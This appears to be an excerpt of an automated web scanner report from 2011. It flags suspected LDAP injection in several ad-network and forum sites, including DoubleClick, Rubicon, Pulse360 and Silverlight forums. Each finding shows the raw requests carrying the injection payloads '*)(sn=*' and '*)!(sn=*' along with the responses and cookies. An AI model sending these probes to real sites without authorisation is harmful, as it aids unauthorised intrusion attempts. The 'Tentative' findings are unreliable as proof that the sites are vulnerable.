<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 15:54:29 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Options-Charting_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 10;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cc/%2a/u%3B234282361%3B0-0%3B0%3B58044029%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cc/%2a/u%3B234282361%3B0-0%3B0%3B58044029%3B4307-300/250%3B38529125/38546882/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Platforms/TradingTools/OptionsTrading.aspx[QM][AMP]offer=PLU";
ctp[1] = "clickTag1";
ctv[1] = "http://www.theocc.com/about/publications/character-risks.jsp";


var fv='"moviePath='+
...[SNIP]...

Request 2

GET /adi/N6036.149339.MICROSOFTONLINE/B5123903.4;sz=300x250;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=;ord=2247611? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 30 Jan 2011 14:49:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6450

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
<!-- Code auto-generated on Thu Sep 23 15:41:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_ETFHQ-Pricing_300x250.swf";
var gif = "http://s0.2mdn.net/2530996/Schwab_AI_Q410_Webinar-Analysis_300x250.gif";
var minV = 9;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cd/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003L/13000000000033752.1?!&&PID=9a64f1d27d5c07b6)!(sn=*&UIT=G&TargetID=37312983&AN=2247611&PG=NBCMSN&ASID=ba6dbe6ad5a4463dabe7968ba206987a&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/17/cd/%2a/f%3B234282360%3B1-0%3B0%3B58044029%3B4307-300/250%3B38529150/38546907/1%3B%3B%7Esscs%3D%3fhttp://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "http://www.schwabat.com/offer/offerdirect.aspx?offer=PLU&url=/Research/ETFoverview.aspx[QM][AMP]offer=PLU";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctInde
...[SNIP]...

2.5. http://ad.doubleclick.net/adj/N4478.redactedOX2487/B5084478.4 [AN parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N4478.redactedOX2487/B5084478.4

Issue detail

The AN parameter appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the AN parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /adj/N4478.redactedOX2487/B5084478.4;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003G/81000000000034516.1?!&&PID=8240106&UIT=G&TargetID=37665412&AN=*)(sn=*&PG=NBCSAT&ASID=04cbc315ee164e08b173b0c21e708489&destination=;ord=806044538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 01:40:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4617

document.write('<!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->\n<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1782317/SEA8889_30series_newegg_1_21_300x250.swf";
var gif = "http://s0.2mdn.net/1782317/SEA8889_30series_newegg_1_21_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/s%3B233397388%3B0-0%3B0%3B57368132%3B4307-300/250%3B40404797/40422584/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.newegg.com/Product/Product.aspx?Item=N82E16824001423&Tpk=B2230HD");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/s%3B233397388%3B0-0%3B0%3B57368132%3B4307-300/250%3B40404797/40422584/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3f"+ct[i]);}else{x=escape(ct[i]);}fv+="&clickTag"+i+"="+x+"&clickTAG"+i+"="+x+"&clicktag"+i+"="+x;}}
fv+='"';
var bgo=(bg=="same as SWF")?"":'<param name="bgcolor" value="#'+bg+'">';
var bge=(bg=="same as SWF")?"":' bgcolor="#'+bg+'"';
function FSWin(){if((openWindow=="false
...[SNIP]...

Request 2

GET /adj/N4478.redactedOX2487/B5084478.4;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003G/81000000000034516.1?!&&PID=8240106&UIT=G&TargetID=37665412&AN=*)!(sn=*&PG=NBCSAT&ASID=04cbc315ee164e08b173b0c21e708489&destination=;ord=806044538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 01:40:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5626

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Mon Jan 24 16:18:48 EST 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1782317/SEA8889_30series_tiger_1_21_300x250.swf";
var gif = "http://s0.2mdn.net/1782317/SEA8889_31series_newegg_1_21_300x250.jpg";
var minV = 8;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/d%3B233397388%3B2-0%3B0%3B57368132%3B4307-300/250%3B40404840/40422627/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/d%3B233397388%3B2-0%3B0%3B57368132%3B4307-300/250%3B40404840/40422627/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://www.tigerdirect.com/applications/SearchTools/item-details.asp?EdpNo=6532393");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";
ctp[1] = "clickTag";
ctv[1] = "";
ctp[2] = "clickTag";
ctv[2] = "";
ctp[3] = "clickTag";
ctv[3] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%
...[SNIP]...

2.6. http://assets.rubiconproject.com/static/rtb/sync-min.html/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://assets.rubiconproject.com
Path:   /static/rtb/sync-min.html/

Issue detail

The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /static/*)(sn=*/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 318
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/*)(sn=*/sync-min.html/ was not found on this
...[SNIP]...
</p>
<hr>
<address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address>
</body></html>

Request 2

GET /static/*)!(sn=*/sync-min.html/ HTTP/1.1
Host: assets.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; pup_2081=1296226100651; lm="28 Jan 2011 14:48:45 GMT"; pup_2084=1296226112564; pup_w55c=1296073239463; put_2132=D8DB51BF08484217F5D14AB47F4002AD; pup_2132=1296226115755; pup_rubicon=1296232891481; pup_1902=1296226099073; put_2025=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; csi9=3151064.js^1^1296308448^1296308448&618554.js^1^1296308324^1296308324; put_1185=3011330574290390485; pup_1197=1296232890383; rpb=4894%3D1%264939%3D1%262399%3D1%263615%3D1%264940%3D1%265574%3D1%264210%3D1%265328%3D1%264554%3D1%265671%3D1%265852%3D1%264212%3D1%266286%3D1%266073%3D1%264214%3D1%263612%3D1%262372%3D1%262196%3D1%262111%3D1%262494%3D1%262189%3D1%263169%3D1%262374%3D1; rdk=7665/13236; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3182054.js^1^1296236268^1296236268&763123.js^1^1296236268^1296236268&618560.js^1^1296236263^1296236263&3174529.js^3^1296226115^1296232920&3168345.js^2^1296232903^1296232919&3178300.js^1^1296232904^1296232904&3187311.js^2^1296226114^1296226127&3173809.js^1^1296224076^1296224076&3178297.js^1^1296224073^1296224073; put_2081=CA-00000000456885722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; put_1994=6ch47d7o8wtv; pup_1512=1296224128533; pup_1986=1296226114410; pup_2100=1296226117318; pup_2025=1296224125224; pup_2101=1296226106985; put_2100=usr3fd748acf5bcab14; pup_1430=1296224129445; put_1430=e6f6dead-6db2-4b47-a015-f587315583eb; pup_1185=1296226114213; khaos=GIPAEQ2D-C-IOYY; put_1197=3297869551067506954; au=GIP9HWY4-MADS-10.208.38.239; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^7^1296350983^2915161843; put_2101=82d726c3-44ee-407c-85c4-39a0b0fc11ef; csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; ses9=9320^1&7531^1; pup_fimserve=1296224133489; put_1512=4d3702bc-839e-0690-5370-3c19a9561295; put_1986=4760492999213801733; rdk2=0; ses2=7531^1&13236^1; cd=false;

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (Red Hat)
Content-Length: 228
_onnection: close
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 30 Jan 2011 02:05:46 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /static/*)!(sn=*/sync-min.html/ was not found on this
...[SNIP]...
</p>
</body></html>

2.7. http://click.pulse360.com/cgi-bin/clickthrough.cgi [creative parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://click.pulse360.com
Path:   /cgi-bin/clickthrough.cgi

Issue detail

The creative parameter appears to be vulnerable to LDAP injection attacks.

The payloads 9942f194f5ec0141)(sn=* and 9942f194f5ec0141)!(sn=* were each submitted in the creative parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /cgi-bin/clickthrough.cgi?db=context&position=7001&tid=bhnibpnmbjnlbgnjbnnpzn&eid=1&id=92509073&creative=9942f194f5ec0141)(sn=*&query=site%20specific%3Amsnbc.com%3Aimage%20image&clickid=92896433&tz=US&UNQ=00000129635037996412713000000106050054&value=UO22E35J253LM&origvalue=GZODAL6QJGBNK&cgroup=adbreak4_blogs HTTP/1.1
Host: click.pulse360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:06:49 GMT
Server: Denaro/1.1
Connection: close
Location: http://c2.edapebaf.com/cgi-bin/unbilled_click.cgi?id=92509073&source=92896433&db=context&query=site%20specific%3Amsnbc.com%3Aimage%20image&creative=9942f194f5ec0141)(sn&subid=
Content-Type: text/html

Request 2

GET /cgi-bin/clickthrough.cgi?db=context&position=7001&tid=bhnibpnmbjnlbgnjbnnpzn&eid=1&id=92509073&creative=9942f194f5ec0141)!(sn=*&query=site%20specific%3Amsnbc.com%3Aimage%20image&clickid=92896433&tz=US&UNQ=00000129635037996412713000000106050054&value=UO22E35J253LM&origvalue=GZODAL6QJGBNK&cgroup=adbreak4_blogs HTTP/1.1
Host: click.pulse360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:06:50 GMT
Server: Denaro/1.1
Connection: close
Location: http://c2.edapebaf.com/cgi-bin/unbilled_click.cgi?id=92509073&source=92896433&db=context&query=site%20specific%3Amsnbc.com%3Aimage%20image&creative=9942f194f5ec0141)!(sn&subid=
Content-Type: text/html


2.8. http://forums.silverlight.net/forums/53.aspx [ASP.NET_SessionId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://forums.silverlight.net
Path:   /forums/53.aspx

Issue detail

The ASP.NET_SessionId cookie appears to be vulnerable to LDAP injection attacks.

The payloads c9aa3c72e7b4fb27)(sn=* and c9aa3c72e7b4fb27)!(sn=* were each submitted in the ASP.NET_SessionId cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /forums/53.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=c9aa3c72e7b4fb27)(sn=*;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72837
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:40:01 GMT; expires=Mon, 30-Jan-2012 15:40:01 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0uiuc355vxi0jo55duaqdi45; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:00:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:40:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WCF RI
...[SNIP]...
<a href="/members/mbanavige.aspx" title="mbanavige" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="mbanavige" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/mbanavige.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/Gaz3ll.aspx" title="Gaz3ll" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="Gaz3ll" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/Gaz3ll.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/Tony.Champion.aspx" title="Tony.Champion" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="Tony.Champion" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/Tony.Champion.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/j2inet.aspx" title="j2inet" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="j2inet" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/j2inet.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>


...[SNIP]...

Request 2

GET /forums/53.aspx HTTP/1.1
Host: forums.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sat, 29 Jan 2011 18:15:21 GMT; s_cc=true; CommunityServer-LastVisitUpdated-2101=; CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; s_sq=msstoslvnet%3D%2526pid%253Dwww.silverlight.net/%2526pidt%253D1%2526oid%253Dhttp%25253A//forums.silverlight.net/%2526ot%253DA; omniID=b9c4f797_281a_4a6b_b1ac_aadc45678f4a; ASP.NET_SessionId=c9aa3c72e7b4fb27)!(sn=*;

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 72821
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 30 Jan 2011 10:40:02 GMT; expires=Mon, 30-Jan-2012 15:40:02 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3vu44r55bgcoj055yau41u45; path=/; HttpOnly
Set-Cookie: CSAnonymous=881453a5-745e-45aa-a789-e4b7fd1f6af3; expires=Sun, 30-Jan-2011 16:00:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 15:40:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   WCF RI
...[SNIP]...
<a href="/members/mbcrump.aspx" title="mbcrump" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="mbcrump" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/mbcrump.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/pitchai.be.aspx" title="pitchai.be" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="pitchai.be" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i3.silverlight.net/avatar/pitchai.be.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/atti.aspx" title="atti" class="online">
<img src="http://i3.silverlight.net/avatar/anonymous.jpg?forceidenticon=True&dt=634319808000000000&cdn_id=12152010" alt="atti" onload="this.onload = null;LazyLoadAvatarImage(this,'http://i1.silverlight.net/avatar/atti.jpg?forceidenticon=False&dt=634319808000000000&cdn_id=12152010');" />
</a>
</li>

<li>
<a href="/members/MisterGoodcat.aspx" title="MisterGoodcat" class="online">
